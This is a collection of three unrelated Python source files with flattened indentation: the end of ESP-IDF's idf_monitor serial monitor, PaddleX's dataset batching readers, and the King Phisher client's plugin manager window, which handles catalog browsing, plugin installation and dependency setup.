""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to run 'make flash'.
--- Press {} to run 'make app-flash'.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A)))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [ CTRL_F, CTRL_A ]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
yellow_print("Running make %s..." % target)
p = subprocess.Popen([self.make,
target ])
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
def lookup_pc_address(self, pc_addr):
translation = subprocess.check_output(
["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr],
cwd=".")
if not "?? ??:0" in translation:
yellow_print(translation)
def check_gdbstub_trigger(self, c):
self._gdb_buffer = self._gdb_buffer[-6:] + c # keep the last 7 characters seen
m = re.match(b"\\$(T..)#(..)", self._gdb_buffer) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(p) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
subprocess.call(["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file], cwd=".")
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
self.prompt_next_action("gdb exited")
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ]
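    # Editor's example: ANSI_RED ('\033[1;31m') is matched by RE_ANSI_COLOR with
    # group(2) == b'1', i.e. ANSI_TO_WINDOWS_COLOR[1] == 4 (red), while
    # group(1) == b'1' additionally sets FOREGROUND_INTENSITY, giving attribute 12.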
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output):
self.output = output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def write(self, data):
for b in data:
l = len(self.matched)
if b == '\033': # ESC
self.matched = b
elif (l == 1 and b == '[') or (1 < l < 7):
self.matched += b
if self.matched == ANSI_NORMAL: # reset console
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
SetConsoleTextAttribute(self.handle, color)
else:
self.output.write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
try:
self.output.write(b)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly fails
# (but always succeeds the second time, it seems.) Ref https://github.com/espressif/esp-idf/issues/1136
self.output.write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
dataset.py
|
# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread
import multiprocessing
import collections
import numpy as np
import six
import sys
import copy
import random
import platform
import chardet
import paddlex.utils.logging as logging
class EndSignal():
pass
def is_pic(img_name):
valid_suffix = ['JPEG', 'jpeg', 'JPG', 'jpg', 'BMP', 'bmp', 'PNG', 'png']
suffix = img_name.split('.')[-1]
if suffix not in valid_suffix:
return False
return True
def is_valid(sample):
if sample is None:
return False
if isinstance(sample, tuple):
for s in sample:
if s is None:
return False
elif isinstance(s, np.ndarray) and s.size == 0:
return False
elif isinstance(s, collections.Sequence) and len(s) == 0:
return False
return True
def get_encoding(path):
    # read the raw bytes and let chardet guess the file encoding; close the
    # handle promptly instead of leaking it
    with open(path, 'rb') as f:
        data = f.read()
    return chardet.detect(data).get('encoding')
def multithread_reader(mapper,
reader,
num_workers=4,
buffer_size=1024,
batch_size=8,
drop_last=True):
from queue import Queue
end = EndSignal()
# define a worker to read samples from reader to in_queue
def read_worker(reader, in_queue):
for i in reader():
in_queue.put(i)
in_queue.put(end)
# define a worker to handle samples from in_queue by mapper
# and put mapped samples into out_queue
def handle_worker(in_queue, out_queue, mapper):
sample = in_queue.get()
while not isinstance(sample, EndSignal):
if len(sample) == 2:
r = mapper(sample[0], sample[1])
elif len(sample) == 3:
r = mapper(sample[0], sample[1], sample[2])
else:
raise Exception('The sample\'s length must be 2 or 3.')
if is_valid(r):
out_queue.put(r)
sample = in_queue.get()
in_queue.put(end)
out_queue.put(end)
def xreader():
in_queue = Queue(buffer_size)
out_queue = Queue(buffer_size)
# start a read worker in a thread
target = read_worker
t = Thread(target=target, args=(reader, in_queue))
t.daemon = True
t.start()
# start several handle_workers
target = handle_worker
args = (in_queue, out_queue, mapper)
workers = []
for i in range(num_workers):
worker = Thread(target=target, args=args)
worker.daemon = True
workers.append(worker)
for w in workers:
w.start()
batch_data = []
sample = out_queue.get()
while not isinstance(sample, EndSignal):
batch_data.append(sample)
if len(batch_data) == batch_size:
batch_data = GenerateMiniBatch(batch_data)
yield batch_data
batch_data = []
sample = out_queue.get()
finish = 1
while finish < num_workers:
sample = out_queue.get()
if isinstance(sample, EndSignal):
finish += 1
else:
batch_data.append(sample)
if len(batch_data) == batch_size:
batch_data = GenerateMiniBatch(batch_data)
yield batch_data
batch_data = []
if not drop_last and len(batch_data) != 0:
batch_data = GenerateMiniBatch(batch_data)
yield batch_data
batch_data = []
return xreader
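# Editor's note (hypothetical usage, not part of the original module): `reader` is a
# zero-argument callable yielding samples as tuples of length 2 or 3, and `mapper`
# (typically the dataset transforms) is applied to each sample before batching:
#
#     batch_reader = multithread_reader(transforms, sample_generator,
#                                       num_workers=4, batch_size=8)
#     for batch in batch_reader():
#         ...  # a list of mapped samples, padded by GenerateMiniBatch
#
# `transforms` and `sample_generator` are placeholder names used only here.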
def multiprocess_reader(mapper,
reader,
num_workers=4,
buffer_size=1024,
batch_size=8,
drop_last=True):
from .shared_queue import SharedQueue as Queue
def _read_into_queue(samples, mapper, queue):
end = EndSignal()
try:
for sample in samples:
if sample is None:
raise ValueError("sample has None")
if len(sample) == 2:
result = mapper(sample[0], sample[1])
elif len(sample) == 3:
result = mapper(sample[0], sample[1], sample[2])
else:
raise Exception('The sample\'s length must be 2 or 3.')
if is_valid(result):
queue.put(result)
queue.put(end)
except:
queue.put("")
six.reraise(*sys.exc_info())
def queue_reader():
queue = Queue(buffer_size, memsize=3 * 1024**3)
total_samples = [[] for i in range(num_workers)]
for i, sample in enumerate(reader()):
index = i % num_workers
total_samples[index].append(sample)
for i in range(num_workers):
p = multiprocessing.Process(
target=_read_into_queue,
args=(total_samples[i], mapper, queue))
p.start()
finish_num = 0
batch_data = list()
while finish_num < num_workers:
sample = queue.get()
if isinstance(sample, EndSignal):
finish_num += 1
elif sample == "":
raise ValueError("multiprocess reader raises an exception")
else:
batch_data.append(sample)
if len(batch_data) == batch_size:
batch_data = GenerateMiniBatch(batch_data)
yield batch_data
batch_data = []
if len(batch_data) != 0 and not drop_last:
batch_data = GenerateMiniBatch(batch_data)
yield batch_data
batch_data = []
return queue_reader
def GenerateMiniBatch(batch_data):
if len(batch_data) == 1:
return batch_data
width = [data[0].shape[2] for data in batch_data]
height = [data[0].shape[1] for data in batch_data]
if len(set(width)) == 1 and len(set(height)) == 1:
return batch_data
max_shape = np.array([data[0].shape for data in batch_data]).max(axis=0)
padding_batch = []
for data in batch_data:
im_c, im_h, im_w = data[0].shape[:]
padding_im = np.zeros(
(im_c, max_shape[1], max_shape[2]), dtype=np.float32)
padding_im[:, :im_h, :im_w] = data[0]
padding_batch.append((padding_im, ) + data[1:])
return padding_batch
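# Editor's worked example: for two CHW images of shapes (3, 224, 200) and
# (3, 200, 224), max_shape becomes (3, 224, 224); each image is copied into the
# top-left corner of a zero array of that shape, so the batch has a uniform shape.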
class Dataset:
def __init__(self,
transforms=None,
num_workers='auto',
buffer_size=100,
parallel_method='process',
shuffle=False):
if num_workers == 'auto':
import multiprocessing as mp
num_workers = mp.cpu_count() // 2 if mp.cpu_count() // 2 < 8 else 8
if platform.platform().startswith("Darwin") or platform.platform(
).startswith("Windows"):
parallel_method = 'thread'
if transforms is None:
raise Exception("transform should be defined.")
self.transforms = transforms
self.num_workers = num_workers
self.buffer_size = buffer_size
self.parallel_method = parallel_method
self.shuffle = shuffle
def generator(self, batch_size=1, drop_last=True):
self.batch_size = batch_size
parallel_reader = multithread_reader
if self.parallel_method == "process":
if platform.platform().startswith("Windows"):
logging.debug(
"multiprocess_reader is not supported in Windows platform, force to use multithread_reader."
)
else:
parallel_reader = multiprocess_reader
return parallel_reader(
self.transforms,
self.iterator,
num_workers=self.num_workers,
buffer_size=self.buffer_size,
batch_size=batch_size,
drop_last=drop_last)
def set_num_samples(self, num_samples):
if num_samples > len(self.file_list):
logging.warning(
"You want set num_samples to {}, but your dataset only has {} samples, so we will keep your dataset num_samples as {}"
.format(num_samples, len(self.file_list), len(self.file_list)))
num_samples = len(self.file_list)
self.num_samples = num_samples
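# Editor's sketch (hypothetical, not part of the original module): concrete dataset
# classes are expected to provide `file_list`, `num_samples` and an `iterator`
# method; `generator()` then wraps `iterator` with a parallel reader, e.g.
#
#     train_dataset = SomeDataset(transforms=train_transforms, parallel_method='thread')
#     for batch in train_dataset.generator(batch_size=8, drop_last=True)():
#         ...  # each batch is a list of transformed, shape-padded samples
#
# `SomeDataset` and `train_transforms` are placeholder names used only here.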
|
plugin_manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/windows/plugin_manager.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import collections
import copy
import datetime
import errno
import functools
import os
import sys
import traceback
from king_phisher import utilities
from king_phisher.catalog import Catalog
from king_phisher.client import plugins
from king_phisher.client import gui_utilities
from king_phisher.client.widget import managers
from king_phisher.client.windows import html
from gi.repository import Gdk
from gi.repository import Gtk
import requests.exceptions
import smoke_zephyr.requirements
import smoke_zephyr.utilities
__all__ = ('PluginManagerWindow',)
_ROW_TYPE_PLUGIN = 'plugin'
_ROW_TYPE_REPOSITORY = 'repository'
_ROW_TYPE_CATALOG = 'catalog'
_LOCAL_REPOSITORY_ID = 'local'
_LOCAL_REPOSITORY_TITLE = '[Locally Installed]'
_ModelNamedRow = collections.namedtuple('ModelNamedRow', (
'id',
'installed',
'enabled',
'title',
'compatibility',
'version',
'visible_enabled',
'visible_installed',
'sensitive_installed',
'type'
))
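# Editor's note: the field order of _ModelNamedRow must stay in sync with the
# Gtk.TreeStore column types built in PluginManagerWindow.__init__
# (str, bool, bool, str, str, str, bool, bool, bool, str); for example,
# _ModelNamedRow._fields.index('title') == 3 is also the model's sort column.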
class _ModelNode(object):
__slots__ = ('children', 'row')
def __init__(self, *args, **kwargs):
self.row = _ModelNamedRow(*args, **kwargs)
self.children = collections.deque()
class PluginDocumentationWindow(html.HTMLWindow):
"""
A window for displaying plugin documentation from their respective README.md
    files. If the documentation file can not be found, a
    :py:exc:`.FileNotFoundError` exception will be raised on initialization. The
    contents of the README.md file are then rendered as markdown data and
displayed using an :py:class:`~king_phisher.client.windows.html.HTMLWindow`.
The plugin must be loaded into the
:py:attr:`~king_phisher.client.application.KingPhisherClientApplication.plugin_manager`
but does not have to be enabled for documentation to be displayed.
"""
template = 'plugin-documentation.html'
"""The Jinja2 HTML template to load for hosting the rendered markdown documentation."""
def __init__(self, application, plugin_id):
"""
:param application: The parent application for this object.
:type application: :py:class:`Gtk.Application`
:param str plugin_id: The identifier of this plugin.
"""
super(PluginDocumentationWindow, self).__init__(application)
plugin_path = self.application.plugin_manager.get_plugin_path(plugin_id)
if plugin_path is None:
raise FileNotFoundError(errno.ENOENT, "could not find the data path for plugin '{0}'".format(plugin_id))
md_file = os.path.join(plugin_path, 'README.md')
if md_file is None or not os.path.isfile(md_file):
self.window.destroy()
raise FileNotFoundError(errno.ENOENT, "plugin '{0}' has no documentation".format(plugin_id), md_file)
self._md_file = md_file
self._plugin = self.application.plugin_manager[plugin_id]
self.refresh()
self.webview.connect('key-press-event', self.signal_key_press_event)
self.webview.connect('open-remote-uri', self.signal_webview_open_remote_uri)
self.window.set_title('Plugin Documentation')
def refresh(self):
"""
Refresh the contents of the documentation. This will reload both the
markdown content from README.md as well as the HTML template file.
"""
self.webview.load_markdown_file(self._md_file, template=self.template, template_vars={'plugin': self._plugin})
def signal_webview_open_remote_uri(self, webview, uri, decision):
utilities.open_uri(uri)
def signal_key_press_event(self, webview, event):
if event.type != Gdk.EventType.KEY_PRESS:
return
keyval = event.get_keyval()[1]
if keyval == Gdk.KEY_F5:
self.refresh()
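# Editor's sketch (hypothetical usage): the window is constructed on demand, which
# mirrors signal_popup_menu_activate_show_documentation further below, e.g.
#
#     try:
#         PluginDocumentationWindow(self.application, plugin_id)
#     except FileNotFoundError as error:
#         gui_utilities.show_dialog_warning('No Documentation', self.window, error.strerror)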
class PluginManagerWindow(gui_utilities.GladeGObject):
"""
The window which allows the user to selectively enable and disable plugins
for the client application. This also handles configuration changes, so the
enabled plugins will persist across application runs.
"""
dependencies = gui_utilities.GladeDependencies(
children=(
'expander_info',
'grid_catalog_repo_info',
'grid_plugin_info',
'label_catalog_repo_info_description',
'label_catalog_repo_info_for_description',
'label_catalog_repo_info_for_maintainers',
'label_catalog_repo_info_homepage',
'label_catalog_repo_info_maintainers',
'label_catalog_repo_info_title',
'label_plugin_info_authors',
'label_plugin_info_compatible',
'label_plugin_info_description',
'label_plugin_info_for_classifiers',
'label_plugin_info_for_compatible',
'label_plugin_info_for_references',
'label_plugin_info_homepage',
'label_plugin_info_title',
'label_plugin_info_version',
'listbox_plugin_info_classifiers',
'listbox_plugin_info_references',
'menubutton_plugin_info',
'paned_plugins',
'scrolledwindow_plugins',
'stack_info',
'treeview_plugins',
'textview_plugin_info',
'viewport_info',
'statusbar'
)
)
top_gobject = 'window'
def __init__(self, *args, **kwargs):
super(PluginManagerWindow, self).__init__(*args, **kwargs)
self.catalog_plugins = plugins.ClientCatalogManager(self.application.user_data_path)
self.plugin_path = os.path.join(self.application.user_data_path, 'plugins')
self.status_bar = self.gobjects['statusbar']
self._installed_plugins_treeview_tracker = None
"""
This is used to track and make sure all plugins make it into the
treeview. It is set each time catalogs are loaded or refreshed. Once the
loading operation is complete, plugins that remain were not loaded due
their data (repo or id) missing from the catalog, likely due to it
having been removed.
"""
self._worker_thread = None
self._worker_thread_start(self._load_catalogs_tsafe)
self.__load_errors = {}
self.__installing_plugin = None
tvm = managers.TreeViewManager(self.gobjects['treeview_plugins'])
toggle_renderer_enable = Gtk.CellRendererToggle()
toggle_renderer_enable.connect('toggled', self.signal_renderer_toggled_enable)
toggle_renderer_install = Gtk.CellRendererToggle()
toggle_renderer_install.connect('toggled', self.signal_renderer_toggled_install)
tvm.set_column_titles(
('Installed', 'Enabled', 'Title', 'Compatible', 'Version'),
column_offset=1,
renderers=(
toggle_renderer_install,
toggle_renderer_enable,
Gtk.CellRendererText(),
Gtk.CellRendererText(),
Gtk.CellRendererText()
)
)
tvm.column_views['Enabled'].set_cell_data_func(toggle_renderer_enable, self._toggle_enabled_cell_data_func)
tvm.column_views['Enabled'].add_attribute(toggle_renderer_enable, 'sensitive', 1)
tvm.column_views['Enabled'].add_attribute(toggle_renderer_enable, 'visible', 6)
tvm.column_views['Installed'].set_cell_data_func(toggle_renderer_install, self._toggle_install_cell_data_func)
tvm.column_views['Installed'].add_attribute(toggle_renderer_install, 'visible', 7)
tvm.column_views['Installed'].add_attribute(toggle_renderer_install, 'sensitive', 8)
self._model = Gtk.TreeStore(str, bool, bool, str, str, str, bool, bool, bool, str)
self._model.set_sort_column_id(3, Gtk.SortType.ASCENDING)
self.gobjects['treeview_plugins'].set_model(self._model)
self._tv_popup_menu = managers.MenuManager(tvm.get_popup_menu())
self._tv_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._tv_popup_menu.append('Reload', self.signal_popup_menu_activate_reload)
self._tv_popup_menu.append('Reload All', self.signal_popup_menu_activate_reload_all)
self._tv_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._tv_popup_menu.append('Show Documentation', self.signal_popup_menu_activate_show_documentation)
self._tv_popup_menu.append('Update', self.signal_popup_menu_activate_update)
self._info_popup_menu = managers.MenuManager()
self._info_popup_menu.append('Reload', self.signal_popup_menu_activate_reload)
self._info_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._info_popup_menu.append('Show Documentation', self.signal_popup_menu_activate_show_documentation)
self._info_popup_menu.append('Update', self.signal_popup_menu_activate_update)
self.gobjects['menubutton_plugin_info'].set_popup(self._info_popup_menu.menu)
self._update_status_bar('Loading...')
self.window.show()
paned = self.gobjects['paned_plugins']
self._paned_offset = paned.get_allocation().height - paned.get_position()
def __store_add_node(self, node, parent=None):
"""
Add a :py:class:`._ModelNode` to :py:attr:`._model`, recursively adding
child :py:class:`._ModelNode` or :py:class:`._ModelNamedRow` instances as
necessary. This is *not* tsafe.
:param node: The node to add to the TreeView model.
:type node: :py:class:`._ModelNode`
:param parent: An optional parent for the node, used for recursion.
"""
row = self._model.append(parent, node.row)
for child in node.children:
if isinstance(child, _ModelNode):
self.__store_add_node(child, parent=row)
elif isinstance(child, _ModelNamedRow):
self._model.append(row, child)
else:
raise TypeError('unsupported node child type')
def _add_catalog_to_tree_tsafe(self, catalog):
"""
        Create a :py:class:`._ModelNode` instance representing the catalog and its
        data, and add it to the TreeView model.
:param catalog: The catalog to add to the TreeView.
:type catalog: :py:class:`.Catalog`
"""
catalog_node = _ModelNode(
id=catalog.id,
installed=None,
enabled=True,
title=catalog.id,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_CATALOG
)
for repo in catalog.repositories.values():
repo_node = _ModelNode(
id=repo.id,
installed=None,
enabled=True,
title=repo.title,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_REPOSITORY
)
catalog_node.children.append(repo_node)
plugin_collection = self.catalog_plugins.get_collection(catalog.id, repo.id)
for plugin_info in plugin_collection.values():
installed = False
enabled = False
plugin_name = plugin_info['name']
install_src = self.config['plugins.installed'].get(plugin_name)
if install_src and repo.id == install_src['repo_id'] and catalog.id == install_src['catalog_id']:
installed = True
# plugin was added to treeview so it is removed from the temporary tracking dict
self._installed_plugins_treeview_tracker.pop(plugin_name)
enabled = plugin_name in self.config['plugins.enabled']
repo_node.children.append(_ModelNamedRow(
id=plugin_name,
installed=installed,
enabled=enabled,
title=plugin_info['title'],
compatibility='Yes' if self.catalog_plugins.is_compatible(catalog.id, repo.id, plugin_name) else 'No',
version=plugin_info['version'],
visible_enabled=True,
visible_installed=True,
sensitive_installed=True,
type=_ROW_TYPE_PLUGIN
))
gui_utilities.glib_idle_add_once(self.__store_add_node, catalog_node)
def _get_plugin_model_parents(self, plugin_model_row):
return _ModelNamedRow(*plugin_model_row.parent), _ModelNamedRow(*plugin_model_row.parent.parent)
def _on_plugin_load_error_tsafe(self, name, error):
# WARNING: this may not be called from the GUI thread
self.__load_errors[name] = (error, traceback.format_exception(*sys.exc_info(), limit=5))
def _plugin_disable(self, model_row):
named_row = _ModelNamedRow(*model_row)
self.application.plugin_manager.disable(named_row.id)
self.config['plugins.enabled'].remove(named_row.id)
self._set_model_item(model_row.path, enabled=False, sensitive_installed=True)
def _plugin_enable(self, model_row):
named_row = _ModelNamedRow(*model_row)
pm = self.application.plugin_manager
if not pm.loaded_plugins[named_row.id].is_compatible:
gui_utilities.show_dialog_error('Incompatible Plugin', self.window, 'This plugin is not compatible.')
return
if not pm.enable(named_row.id):
return
self._set_model_item(model_row.path, enabled=True, sensitive_installed=False)
self.config['plugins.enabled'].append(named_row.id)
def _plugin_install(self, model_row):
if not self._worker_thread_is_ready:
# check it here to fail fast, then self._worker_thread_start checks it again later
self._show_dialog_busy()
return
named_row = _ModelNamedRow(*model_row)
repo_model, catalog_model = self._get_plugin_model_parents(model_row)
if named_row.id in self.config['plugins.installed']:
plugin_src = self.config['plugins.installed'].get(named_row.id)
if plugin_src != {'catalog_id': catalog_model.id, 'repo_id': repo_model.id, 'plugin_id': named_row.id}:
window_question = 'A plugin with this name is already installed from another\nrepository. Do you want to replace it with this one?'
if not gui_utilities.show_dialog_yes_no('Plugin Already Installed', self.window, window_question):
return
if not self._remove_matching_plugin(named_row, plugin_src):
self.logger.warning("failed to uninstall plugin {0}".format(named_row.id))
return
self._worker_thread_start(self._plugin_install_tsafe, catalog_model, repo_model, model_row, named_row)
def _plugin_install_tsafe(self, catalog_model, repo_model, model_row, named_row):
self.__installing_plugin = named_row.id
self.logger.debug("installing plugin '{0}'".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {}...".format(named_row.title))
_show_dialog_error_tsafe = functools.partial(gui_utilities.glib_idle_add_once, gui_utilities.show_dialog_error, 'Failed To Install', self.window)
try:
self.catalog_plugins.install_plugin(catalog_model.id, repo_model.id, named_row.id, self.plugin_path)
except requests.exceptions.ConnectionError:
self.logger.warning("failed to download plugin {}".format(named_row.id))
_show_dialog_error_tsafe("Failed to download {} plugin, check your internet connection.".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {} failed.".format(named_row.title))
self.__installing_plugin = None
return
except Exception:
self.logger.warning("failed to install plugin {}".format(named_row.id), exc_info=True)
_show_dialog_error_tsafe("Failed to install {} plugin.".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {} failed.".format(named_row.title))
self.__installing_plugin = None
return
self.config['plugins.installed'][named_row.id] = {'catalog_id': catalog_model.id, 'repo_id': repo_model.id, 'plugin_id': named_row.id}
self.logger.info("installed plugin '{}' from catalog:{}, repository:{}".format(named_row.id, catalog_model.id, repo_model.id))
plugin = self._reload_plugin_tsafe(model_row, named_row)
if self.config['plugins.pip.install_dependencies']:
try:
packages = smoke_zephyr.requirements.check_requirements(tuple(plugin.req_packages.keys()))
except ValueError:
self.logger.warning("requirements check failed for plugin '{}', can not automatically install requirements".format(named_row.id))
packages = None
if packages:
self.logger.debug("installing missing or incompatible packages from PyPi for plugin '{0}'".format(named_row.id))
self._update_status_bar_tsafe(
"Installing {:,} dependenc{} for plugin {} from PyPi.".format(len(packages), 'y' if len(packages) == 1 else 'ies', named_row.title)
)
if self.application.plugin_manager.library_path:
pip_results = self.application.plugin_manager.install_packages(packages)
else:
self.logger.warning('no library path to install plugin dependencies')
_show_dialog_error_tsafe(
"Failed to run pip to install package(s) for plugin {}.".format(named_row.id)
)
# set pip results to none to safely complete and cleanly release installing lock.
pip_results = None
if pip_results is None:
self.logger.warning('pip install failed')
_show_dialog_error_tsafe(
"Failed to run pip to install package(s) for plugin {}.".format(named_row.id)
)
elif pip_results.status:
self.logger.warning('pip install failed, exit status: ' + str(pip_results.status))
_show_dialog_error_tsafe(
"Failed to install pip package(s) for plugin {}.".format(named_row.id)
)
else:
plugin = self._reload_plugin_tsafe(model_row, named_row)
self.__installing_plugin = None
gui_utilities.glib_idle_add_once(self.__plugin_install_post, catalog_model, repo_model, model_row, named_row)
def __plugin_install_post(self, catalog_model, repo_model, model_row, named_row):
# handles GUI related updates after data has been fetched from the internet
if model_row.path is not None:
version = self.catalog_plugins.get_collection(catalog_model.id, repo_model.id)[named_row.id]['version']
self._set_model_item(model_row.path, installed=True, version=version)
if self._selected_model_row.path == model_row.path:
self._popup_menu_refresh(model_row)
self._update_status_bar("Finished installing plugin {}.".format(named_row.title))
def _plugin_uninstall(self, model_row):
named_row = _ModelNamedRow(*model_row)
if not self.application.plugin_manager.uninstall(named_row.id):
return False
del self.config['plugins.installed'][named_row.id]
if model_row.parent and model_row.parent[_ModelNamedRow._fields.index('id')] == _LOCAL_REPOSITORY_ID:
del self._model[model_row.path]
else:
self._set_model_item(model_row.path, installed=False)
self.logger.info("successfully uninstalled plugin {0}".format(named_row.id))
self._update_status_bar("Finished uninstalling plugin {}.".format(named_row.title))
return True
def _popup_menu_refresh(self, model_row):
named_row = _ModelNamedRow(*model_row)
sensitive = named_row.type == _ROW_TYPE_PLUGIN and named_row.installed
self._info_popup_menu['Show Documentation'].set_property('sensitive', sensitive)
self._tv_popup_menu['Show Documentation'].set_property('sensitive', sensitive)
sensitive = named_row.type == _ROW_TYPE_PLUGIN and named_row.installed and named_row.sensitive_installed
self._info_popup_menu['Update'].set_property('sensitive', sensitive)
self._tv_popup_menu['Update'].set_property('sensitive', sensitive)
